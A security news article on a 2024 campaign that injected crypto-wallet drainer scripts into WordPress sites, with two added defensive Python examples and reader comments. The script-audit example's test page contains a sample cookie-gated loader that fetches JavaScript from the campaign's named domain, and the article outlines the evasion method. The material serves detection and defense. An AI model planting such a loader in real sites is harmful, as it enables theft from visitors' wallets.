WordPress Sites Weaponized in Mass Crypto Wallet Drainer Campaign

The cybersecurity landscape took a dark turn in early March 2024 as researchers uncovered a sprawling campaign that compromised over 2,000 WordPress websites, turning them into crypto-draining portals designed to steal funds and NFTs from unsuspecting visitors.

The Exploit Mechanics

The attack chain began with threat actors exploiting known WordPress vulnerabilities, particularly leveraging CVE-2023-6000, to gain unauthorized access to site administration panels. Once inside, attackers injected malicious JavaScript from the domain dynamic-linx[.]com, a command-and-control infrastructure previously identified by security firm Sucuri in related campaigns.

The injected code employed sophisticated evasion tactics. Before executing its payload, the script checked for a specific cookie — if absent, the malicious operation proceeded. This selective execution helped the malware evade detection by security scanners that do not maintain persistent cookie states during analysis.

Once loaded, the drainer script displayed fake pop-up NFT deals and cryptocurrency discount offers, creating a sense of urgency to lure visitors into connecting their wallets. The malware demonstrated broad compatibility across major wallet providers, including MetaMask, Coinbase Wallet, Ledger, Phantom, and WalletConnect.

Affected Systems

The campaign unfolded in multiple waves. The initial wave compromised roughly 1,000 WordPress sites to push crypto-draining malware promoted through YouTube videos and malvertising. Not satisfied with the reach, attackers then weaponized compromised sites into brute-forcing tools that attempted to crack admin passwords at other websites.

The second wave expanded the operation to approximately 1,700 brute-forcing websites, creating a self-propagating network of compromised infrastructure. This cascading approach allowed the attackers to exponentially grow their pool of infected sites without significant additional investment.
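One way a site operator can spot the brute-forcing side of this campaign from their own logs: count login POSTs per source address and flag when several addresses are hammering the login endpoints at once, which is what "compromised sites brute-forcing other sites" looks like from the receiving end. This is an added example, not code from the article; the access-log lines below are constructed (RFC 5737 test addresses), and the thresholds, the treatment of a 302 as a successful login, and the inclusion of `xmlrpc.php` (which some legitimate plugins also POST to) are assumptions a deployment would tune.

```python
"""Flag distributed password brute forcing against WordPress login endpoints
in web-server access logs. Added example code; thresholds and the sample
log are constructed for illustration."""
import re
from collections import Counter

# Combined-log-format prefix: ip, ident, user, [timestamp], "METHOD path proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints that accept credentials on a stock WordPress install.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

# Constructed log slice: three sources each POSTing repeatedly, one normal user.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Mar/2024:10:01:02 +0000] "GET /blog/ HTTP/1.1" 200 5120
198.51.100.7 - - [05/Mar/2024:10:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
198.51.100.7 - - [05/Mar/2024:10:01:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
198.51.100.7 - - [05/Mar/2024:10:01:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
198.51.100.7 - - [05/Mar/2024:10:01:08 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
192.0.2.44 - - [05/Mar/2024:10:01:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 418
192.0.2.44 - - [05/Mar/2024:10:01:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 418
192.0.2.44 - - [05/Mar/2024:10:01:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 418
192.0.2.91 - - [05/Mar/2024:10:01:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
192.0.2.91 - - [05/Mar/2024:10:01:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
192.0.2.91 - - [05/Mar/2024:10:01:13 +0000] "POST /wp-login.php HTTP/1.1" 200 3210
203.0.113.10 - - [05/Mar/2024:10:02:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""


def detect_login_bruteforce(lines, per_ip_threshold=3, distributed_threshold=3):
    """Return per-source login attempt counts, the sources over threshold, and
    whether enough distinct sources are involved to call it distributed.

    Assumption: a failed wp-login.php POST re-renders the form (HTTP 200) while a
    successful one redirects (HTTP 302), so 302s are not counted as attempts.
    The caller is expected to pass lines from one time window (e.g. 5 minutes).
    """
    attempts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path in LOGIN_PATHS and m["status"] != "302":
            attempts[m["ip"]] += 1

    flagged = {ip: n for ip, n in attempts.items() if n >= per_ip_threshold}
    return {
        "attempts": dict(attempts),
        "flagged_sources": flagged,
        "distributed": len(flagged) >= distributed_threshold,
    }


if __name__ == "__main__":
    result = detect_login_bruteforce(SAMPLE_LOG.splitlines())
    for ip, n in sorted(result["flagged_sources"].items(), key=lambda kv: -kv[1]):
        print(f"{ip}: {n} login attempts")
    print("distributed brute force:", result["distributed"])
```

Run as-is it reports the three constructed sources and a distributed verdict; the single 302 from the normal user is not counted. The distributed threshold matters more than the per-IP one here: a campaign that spreads its attempts across thousands of compromised sites can stay under any per-IP limit, so the signal to alert on is many low-rate sources converging on the same endpoint.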

With Bitcoin trading at approximately 69,000 and Ethereum above 3,880 during this period, the potential payouts from successful wallet drains made this campaign particularly lucrative for the threat actors involved.

The Mitigation Strategy

Website owners running WordPress installations should immediately audit their sites for unauthorized JavaScript inclusions, particularly scripts loading from external domains. Key mitigation steps include updating all WordPress core files, themes, and plugins to their latest versions, implementing Web Application Firewalls, and conducting regular malware scans.
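As a worked example of the audit described above (added here; not code from the article or from Sucuri), the following Python script pulls every `<script>` out of a saved copy of a WordPress page, flags external script hosts that are not on an owner-maintained allowlist, and flags inline scripts that gate a script loader on `document.cookie`, the evasion pattern described in the exploit section. The sample page, the allowlist hosts and the cookie name are constructed; the only real domain used is dynamic-linx[.]com, which the article names.

```python
"""Audit a WordPress page's HTML for script inclusions the site owner did not
authorize. Added example code; the sample page, allowlist and cookie name are
constructed. Usage: feed the HTML of a page (e.g. saved with curl) to audit_html()."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site owner expects to serve scripts from (constructed example values).
ALLOWED_HOSTS = {"example-shop.test", "cdn.example-shop.test"}

# Inline-script heuristics: a cookie test combined with a dynamic script loader.
COOKIE_GATE = re.compile(r"document\.cookie", re.I)
LOADER = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values
        self.inline = []     # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (finding_type, host, detail) tuples for suspicious scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        # Relative paths (/wp-includes/...) have no host and are same-origin.
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            findings.append(("external-script", host, src))
    for body in parser.inline:
        if COOKIE_GATE.search(body) and LOADER.search(body):
            findings.append(("cookie-gated-loader", None, body.strip()[:80]))
    return findings


# Constructed page: two legitimate includes, one unexpected host, and an inline
# loader that only runs when a marker cookie (name constructed) is absent.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdn.example-shop.test/app.js"></script>
<script src="https://dynamic-linx.com/client.js"></script>
<script>
  if (document.cookie.indexOf("seen=") === -1) {
    var s = document.createElement("script");
    s.src = "https://dynamic-linx.com/client.js";
    document.head.appendChild(s);
  }
</script>
</head><body><p>Shop</p></body></html>"""


if __name__ == "__main__":
    for kind, host, detail in audit_html(SAMPLE_HTML):
        print(f"[{kind}] {host or '-'}: {detail}")
```

The static check is deliberately independent of the cookie: a dynamic scanner that fetches the page once and executes it will see the loader only on the first visit, which is exactly the evasion the article describes, whereas reading the markup catches the branch regardless of what cookies the scanner holds. Run it against the rendered HTML and against the theme and plugin files on disk, since injected code commonly lives in `functions.php` or a plugin directory rather than only in the delivered page.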

For end users, the attack underscores the importance of verifying website authenticity before connecting any crypto wallet. Browser extensions that block unauthorized scripts and DNS-level filtering can provide additional layers of protection against crypto drainer campaigns.

Lessons Learned

This campaign reveals an alarming trend: attackers are moving beyond simple phishing emails to compromise legitimate websites that users already trust. When a familiar blog or business site suddenly displays crypto offers, visitors are far more likely to engage than they would with an obvious scam domain.

The self-propagating nature of the attack, using compromised sites to brute-force additional targets, represents an evolution in crypto-theft infrastructure that security teams must account for in their threat models.

User Action Required

If you connected a wallet to any WordPress site in early March 2024 and noticed unexpected pop-ups or NFT offers, immediately revoke all token approvals, move your assets to a fresh wallet address, and monitor your transaction history for unauthorized transfers. Hardware wallet users should verify that all recent transactions were intentionally authorized on their physical device.

Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always conduct your own research and consult with security professionals regarding crypto asset protection.


7 thoughts on “WordPress Sites Weaponized in Mass Crypto Wallet Drainer Campaign”

  1. 2,000 sites and CVE-2023-6000 was the entry point. if you're running wordpress and haven't patched this yet, honestly what are you doing

    1. the real issue is most of those site owners probably don't even know they're compromised. it's not like the injected script is visible to them

      1. most small business wordpress sites are managed by agencies that install a theme and forget about it. the site owner has no idea what CVE-2023-6000 even is. blaming them misses the point

    2. the cookie check evasion is simple but effective. most scanners don't maintain session state so the malicious payload literally hides behind a single if statement. 2k sites and counting

  2. dynamic-linx domain has been flagged since late 2023 and they still managed to hit 2k sites. infrastructure takedowns are way too slow

    1. dynamic-linx has been cycling through new domains every few weeks. kill one and three pop up. whack-a-mole with infinite respawns because the wp sites hosting the scripts keep multiplying

  3. Mira Kowalczyk

    fake NFT deals as the lure is smart because it targets people already comfortable connecting wallets. the drainer script drained both ETH and ERC-20 tokens in a single approval. brutal efficiency
